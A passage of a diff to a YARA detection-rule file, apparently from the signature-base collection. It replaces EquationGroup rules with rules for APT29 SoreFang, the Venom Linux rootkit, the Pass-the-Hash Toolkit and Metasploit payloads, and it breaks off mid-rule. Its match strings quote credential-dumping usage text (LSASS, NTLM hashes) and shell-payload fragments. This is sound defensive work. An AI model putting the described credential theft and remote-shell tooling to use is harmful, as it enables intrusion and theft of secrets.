-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1805-L1819"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L276-L289"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8fe5102cacd9149a0ed60440c563953d487aa2b28a3b947d821d0cc3f3396a4a"
+		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
+		logic_hash = "652607e0cfe6f5ad6ede169e28f63e8262fc37cbc7baa2525e52e79572d9a468"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
 
 	strings:
-		$s1 = "Modify Privileges failed" fullword wide
-		$s2 = "Given privilege name not found" fullword wide
+		$ = {8A 18 80 FB 2C 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
+		$ = {8A 18 80 FB 2E 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
+		$ = {8A 18 80 FB 20 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Pwdump_Lp : FILE
+rule SIGNATURE_BASE_APT_APT29_Sorefang_Disk_Enumeration_Strings : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file pwdump_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6f356f13-9ec1-5dd9-91b2-6a3071398e81"
-		date = "2017-01-13"
+		description = "Rule to detect SoreFang based on disk enumeration strings"
+		author = "NCSC"
+		id = "0ff01793-6fb7-5cff-b4e4-6709269ab0f0"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1821-L1834"
+		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L291-L310"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7381ffd9b2b720fa99d52bc5805fea942e5a966bf3fd611f1a80a875edd06dad"
+		hash = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
+		logic_hash = "4a225b767dc922625c333aea866638bc5e239137592e46c17563b9cc380b0eea"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
 
 	strings:
-		$x1 = "PWDUMP - - ERROR - -" wide
+		$ = "\x0D\x0AFree on disk: "
+		$ = "Total disk: "
+		$ = "Error in GetDiskFreeSpaceEx\x0D\x0A"
+		$ = "\x0D\x0AVolume label: "
+		$ = "Serial number: "
+		$ = "File system: "
+		$ = "Error in GetVolumeInformation\x0D\x0A"
+		$ = "I can not het information about this disk\x0D\x0A"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Eventlogedit_Implant : FILE
+rule SIGNATURE_BASE_Venom_Rootkit : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file EventLogEdit_Implant.dll"
+		description = "Venom Linux Rootkit"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40239dd0-4159-5c10-96b3-4f1e28c92d97"
-		date = "2017-01-13"
+		id = "fedc6fa9-7dfb-5e54-a7bf-9a16f96d6886"
+		date = "2017-01-12"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1836-L1851"
+		reference = "https://security.web.cern.ch/security/venom.shtml"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_venom_linux_rootkit.yar#L10-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1d391eaed77150ab2a26dfed60ebd82aa2c6802b6b604791fb78d08db7fe5ec9"
+		logic_hash = "0b2211edc6737e9da3e43bec9ef823e80c6bd6463adbb10d6839e9914aed22ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0bb750195fbd93d174c2a8e20bcbcae4efefc881f7961fdca8fa6ebd68ac1edf"
 
 	strings:
-		$s1 = "SYSTEM\\CurrentControlSet\\Services\\EventLog\\%ls" fullword wide
-		$s2 = "Ntdll.dll" fullword ascii
-		$s3 = "hZwOpenProcess" fullword ascii
+		$s1 = "%%VENOM%CTRL%MODE%%" ascii fullword
+		$s2 = "%%VENOM%OK%OK%%" ascii fullword
+		$s3 = "%%VENOM%WIN%WN%%" ascii fullword
+		$s4 = "%%VENOM%AUTHENTICATE%%" ascii fullword
+		$s5 = ". entering interactive shell" ascii fullword
+		$s6 = ". processing ltun request" ascii fullword
+		$s7 = ". processing rtun request" ascii fullword
+		$s8 = ". processing get request" ascii fullword
+		$s9 = ". processing put request" ascii fullword
+		$s10 = "venom by mouzone" ascii fullword
+		$s11 = "justCANTbeSTOPPED" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		filesize < 4000KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Portmap_Lp : FILE
+rule SIGNATURE_BASE_Whosthere_Alt : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PortMap_Lp.dll"
+		description = "Auto-generated rule - file whosthere-alt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1851a17-9858-5c93-9993-2da0559e5d2e"
-		date = "2017-01-13"
+		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1853-L1868"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9666e64b40dc01c5b3756b1334519730765f7075ba9a124a79f5b7ea4bc91e03"
-		score = 75
+		hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
+		logic_hash = "ef7bccb8f63034b885cfaec27663c9b038cd9b1811b4f25a9eae28640dac248b"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
 
 	strings:
-		$s1 = "Privilege elevation failed" fullword wide
-		$s2 = "Portmap ended due to max number of ports" fullword wide
-		$s3 = "Invalid parameters received for portmap" fullword wide
+		$s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+		$s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
+		$s2 = "dump output to a file, -o filename" fullword ascii
+		$s3 = "This tool lists the active LSA logon sessions with NTLM credentials." fullword ascii
+		$s4 = "Error: pth.dll is not in the current directory!." fullword ascii
+		$s5 = "the output format is: username:domain:lmhash:nthash" fullword ascii
+		$s6 = ".\\pth.dll" fullword ascii
+		$s7 = "Cannot get LSASS.EXE PID!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 280KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Processoptions_Lp : FILE
+rule SIGNATURE_BASE_Iam_Alt_Iam_Alt : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ProcessOptions_Lp.dll"
+		description = "Auto-generated rule - file iam-alt.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ccb9751-fbcc-538c-8d55-dfc495067ce5"
-		date = "2017-01-13"
+		id = "cf8ec963-ed23-531e-8ea2-ff9f8643aa75"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1870-L1883"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L33-L54"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc9cd566f57d28ccea6d53d2eba71187f01cdf6e140771cace33349f6439461d"
-		score = 75
+		hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
+		logic_hash = "acd4dae57e8394d4ce2f3dfb44706ea35c3d684ab34fd0c707b6aeedd816280a"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
 
 	strings:
-		$s1 = "Invalid parameter received by implant" fullword wide
+		$s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
+		$s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+		$s2 = "This tool allows you to change the NTLM credentials of the current logon session" fullword ascii
+		$s3 = "username:domainname:lmhash:nthash" fullword ascii
+		$s4 = "Error in cmdline!. Bye!." fullword ascii
+		$s5 = "Error: Cannot open LSASS.EXE!." fullword ascii
+		$s6 = "nthash is too long!." fullword ascii
+		$s7 = "LSASS HANDLE: %x" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Passfreely_Lp : FILE
+rule SIGNATURE_BASE_Genhash_Genhash : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file PassFreely_Lp.dll"
+		description = "Auto-generated rule - file genhash.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5fb99194-f0df-54aa-9f20-7f8458155e62"
-		date = "2017-01-13"
+		id = "bec3c014-df3b-5ac0-9501-9b648856e02b"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1885-L1900"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L56-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c3ceb04b42b6e741b1578ec9ecb83b72c599d9af457d6d4e8de572e481d3aa5c"
-		score = 75
+		hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
+		logic_hash = "fe1ebe7ea94351610e0042eab020d155cbab26d790477909467c9b5a827fb6d6"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
 
 	strings:
-		$s1 = "Unexpected value in memory.  Run the 'CheckOracle' or 'memcheck' command to identify the problem" fullword wide
-		$s2 = "Oracle process memory successfully modified!" fullword wide
-		$s3 = "Unable to reset the memory protection mask to the memory" fullword wide
+		$s1 = "genhash.exe <password>" fullword ascii
+		$s3 = "Password: %s" fullword ascii
+		$s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" fullword ascii
+		$s5 = "This tool generates LM and NT hashes." fullword ascii
+		$s6 = "(hashes format: LM Hash:NT hash)" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_1 : FILE
+rule SIGNATURE_BASE_Iam_Iamdll : FILE
 {
 	meta:
-		description = "EquationGroup Malware"
+		description = "Auto-generated rule - file iamdll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "331d7ba5-e3fa-5ab7-b4de-c7af764be03d"
-		date = "2017-01-13"
+		id = "15e8ddac-af17-5509-b552-b4364af57c90"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1904-L1933"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L76-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "97fe69f0c8f2fc44fdcd796c9390c3912f31c56540af1ca8f2baab16d1e91add"
-		score = 75
+		hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
+		logic_hash = "ef7c66d2e1204a43921b6701812ea8a7bfa8e39e24d9396c95b725a4a4171010"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "694be2698bcc5c7a1cce11f8ef65c1c96a883d14b98148c36b32888fb58b6a7e"
-		hash2 = "73d1d55493886639c619e9f5e312daab93e4feeb74f24dbe51593842baac8d15"
-		hash3 = "e1c9c9f031d902e69e42f684ae5b35a2513f7d5f8bca83dfbab10e8de6254c78"
-		hash4 = "c7bf4c012293e7de56d86f4f5b4eeb6c1c5263568cc4d9863a286a86b5daf194"
-		hash5 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
-		hash6 = "8f5b97124de9fce16e2cfecb7dd2e171824c9e07546db7b3bee7c5f2c92ceda9"
-		hash7 = "dfb38ed2ca3870faf351df1bd447a3dc4470ed568553bf83df07bf07967bf520"
-		hash8 = "d92928a867a685274b0a74ec55c0b83690fca989699310179e184e2787d47f48"
-		hash9 = "137749c0fbb8c12d1a650f0bfc73be2739ff084165d02e4cb68c6496d828bf1d"
-		hash10 = "fe42139748c8e9ba27a812466d9395b3a0818b0cd7b41d6769cb7239e57219fb"
-		hash11 = "2b27f2faae9de6330f17f60a1d19f9831336f57fdfef06c3b8876498882624a6"
-		hash12 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
-		hash13 = "31d86f77137f0b3697af03dd28d6552258314cecd3c1d9dc18fcf609eb24229a"
-		hash14 = "fda57a2ba99bc610d3ff71b2d0ea2829915eabca168df99709a8fdd24288c5e5"
-		hash15 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
 
 	strings:
-		$x1 = "Injection Lib -  GetProcAddress failed on Kernel32.DLL function" fullword wide
-		$x2 = "Injection Lib -  JUMPUP failed to open requested process" fullword wide
+		$s0 = "LSASRV.DLL" fullword ascii
+		$s1 = "iamdll.dll" fullword ascii
+		$s2 = "ChangeCreds" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 115KB and all of them
 }
-
-rule SIGNATURE_BASE_Equationdrug_MS_Identifier
+rule SIGNATURE_BASE_Iam_Iam : FILE
 {
 	meta:
-		description = "Microsoft Identifier used in EquationDrug Platform"
-		author = "Florian Roth (Nextron Systems) @4nc4p"
-		id = "c934c117-bf5a-5688-acd9-5d6c6aacd6bc"
-		date = "2015-03-11"
+		description = "Auto-generated rule - file iam.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "15e8ddac-af17-5509-b552-b4364af57c90"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1937-L1948"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L94-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7b919c82b6e765be5adb927bf79d13f9b37a214a6f8a1f7b237a88ba46ae958c"
-		score = 75
+		hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
+		logic_hash = "f170f6f71b81a674a269ddd441c77a43afbbfe2870e1d0c4101abd2e58bff0b0"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Microsoft(R) Windows (TM) Operating System" fullword wide
+		$s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" fullword ascii
+		$s2 = "iam.exe -h administrator:mydomain:" ascii
+		$s3 = "An error was encountered when trying to change the current logon credentials!." fullword ascii
+		$s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." fullword ascii
+		$s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." fullword ascii
+		$s6 = "Error in cmdline!. Bye!." fullword ascii
+		$s7 = "Checking LSASRV.DLL...." fullword ascii
 
 	condition:
-		$s1 and pe.timestamp > 946684800
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_NET_Msil_Suspicious_Use_Strreverse : FILE
+rule SIGNATURE_BASE_Whosthere_Alt_Pth : FILE
 {
 	meta:
-		description = "Detects mixed use of Microsoft.CSharp and VisualBasic to use StrReverse"
-		author = "dr4k0nia, modified by Florian Roth"
-		id = "830dec40-4412-59c1-8b4d-a237f14acd30"
-		date = "2023-01-31"
-		modified = "2023-02-22"
-		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_net_msil.yar#L2-L31"
+		description = "Auto-generated rule - file pth.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
+		date = "2015-07-10"
+		modified = "2023-12-05"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L116-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "02ce0980427dea835fc9d9eed025dd26672bf2c15f0b10486ff8107ce3950701"
-		logic_hash = "a7440600ee4826568d465d204e0a602f61752e4ffcfa3b4f29e5bc81c4d67b46"
-		score = 70
+		hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
+		logic_hash = "137b0dae105f97b5d4352d16e52144e72306e61be57c5d93df77ad3f5808018e"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		version = "1.1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = ", PublicKeyToken="
-		$a2 = ".NETFramework,Version="
-		$csharp = "Microsoft.CSharp"
-		$vbnet = "Microsoft.VisualBasic"
-		$strreverse = "StrReverse"
+		$s0 = "c:\\debug.txt" fullword ascii
+		$s1 = "pth.dll" fullword ascii
+		$s2 = "\"Primary\" string found at %.8Xh" fullword ascii
+		$s3 = "\"Primary\" string not found!" fullword ascii
+		$s4 = "segment 1 found at %.8Xh" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50MB and all of ( $a* ) and $csharp and $vbnet and $strreverse
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 4 of them
 }
-rule SIGNATURE_BASE_Eternalrocks_Taskhost : FILE
+rule SIGNATURE_BASE_Whosthere : FILE
 {
 	meta:
-		description = "Detects EternalRocks Malware - file taskhost.exe"
+		description = "Auto-generated rule - file whosthere.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8926cdf8-6a3c-5237-80f5-bda9efb39a32"
-		date = "2017-05-18"
+		id = "92e98381-9142-58af-82ce-4df9eb0a0039"
+		date = "2015-07-10"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/stamparm/status/864865144748298242"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_eternalrocks.yar#L12-L30"
+		reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_passthehashtoolkit.yar#L136-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "45e5295f34280078c586c4cb643dba65aed63beffb1d6ded05de03403caf273a"
-		score = 75
+		hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
+		logic_hash = "a13c8a1fc66381b040d6449fe9655191d7a1762da0dc70789cd497fb68fb2a55"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30"
 
 	strings:
-		$x1 = "EternalRocks.exe" fullword wide
-		$s1 = "sTargetIP" fullword ascii
-		$s2 = "SERVER_2008R2_SP0" fullword ascii
-		$s3 = "20D5CCEE9C91A1E61F72F46FA117B93FB006DB51" fullword ascii
-		$s4 = "9EBF75119B8FC7733F77B06378F9E735D34664F6" fullword ascii
+		$s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" fullword ascii
+		$s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." fullword ascii
+		$s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
+		$s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." fullword ascii
+		$s5 = "-B is now used by default. Trying to find correct addresses.." fullword ascii
+		$s6 = "Cannot get LSASS.EXE PID!" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 320KB and 2 of them
 }
-rule SIGNATURE_BASE_Eternalrocks_Svchost : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf : FILE
 {
 	meta:
-		description = "Detects EternalRocks Malware - file taskhost.exe"
+		description = "Metasploit Payloads - file msf.sh"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c38d3faa-06a2-5f57-a917-91974941352f"
-		date = "2017-05-18"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/stamparm/status/864865144748298242"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_eternalrocks.yar#L32-L47"
+		id = "c56dbb8e-1e03-5112-b2ef-a0adfd14dffa"
+		date = "2017-02-09"
+		modified = "2022-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L10-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "989df6d582949adbc4e0e2063c99d9ad83c367cedae1030dc23aade091216602"
+		logic_hash = "4f0eab53a135242c7891b8c88e937a854c945a10000ca4cbf7b21f4596dca410"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31"
+		hash1 = "320a01ec4e023fb5fbbaef963a2b57229e4f918847e5a49c7a3f631cb556e96c"
 
 	strings:
-		$s1 = "WczTkaJphruMyBOQmGuNRtSNTLEs" fullword ascii
-		$s2 = "svchost.taskhost.exe" fullword ascii
-		$s3 = "ConfuserEx v" ascii
+		$s1 = "export buf=\\" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 2 of them )
+		filesize < 5MB and $s1
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_DLL_Moveit_Jun23_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_2
 {
 	meta:
-		description = "Detects compiled ASPX web shells found being used in MOVEit Transfer exploitation"
-		author = "Florian Roth"
-		id = "47db8602-9a9e-5efc-b8b9-fbc4f3c8d4e9"
-		date = "2023-06-01"
+		description = "Metasploit Payloads - file msf.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec1ae1b6-18a3-5590-ae15-1e2b362c545a"
+		date = "2017-02-09"
 		modified = "2023-12-05"
-		reference = "https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/?utm_content=251159938&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L2-L22"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_metasploit_payloads.yar#L25-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "47c2ec1e833852941434586b61d6f435b9acb32b2ff48e0a9e8006e0f9ff8056"
-		score = 85
+		logic_hash = "8f803a5d71a084e1ea453638bdeaa2dd590a1912be652b74b065d9afd332ffa2"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "6cbf38f5f27e6a3eaf32e2ac73ed02898cbb5961566bb445e3c511906e2da1fa"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5"
 
 	strings:
-		$x1 = "human2_aspx" ascii fullword
-		$x2 = "X-siLock-Comment" wide
-		$x3 = "x-siLock-Step1" wide
-		$a1 = "MOVEit.DMZ.Core.Data" ascii fullword
+		$s1 = "& \"\\\" & \"svchost.exe\"" fullword ascii
+		$s2 = "CreateObject(\"Wscript.Shell\")" fullword ascii
+		$s3 = "<% @language=\"VBScript\" %>" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and $a1 ) or all of them
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Moveit_Jun23_1 : FILE
+rule SIGNATURE_BASE_Msfpayloads_Msf_Psh
 {
 	meta:
-		description = "Detects ASPX web shells as being used in MOVEit Transfer exploitation"
-		author = "Florian Roth"
-		id = "2c789b9c-5ec5-5fd1-84e3-6bf7735a9488"
-		date = "2023-06-01"
+		description = "Metasploit Payloads - file msf-psh.vba"
+		author = "Florian Roth (Nextron Systems)"
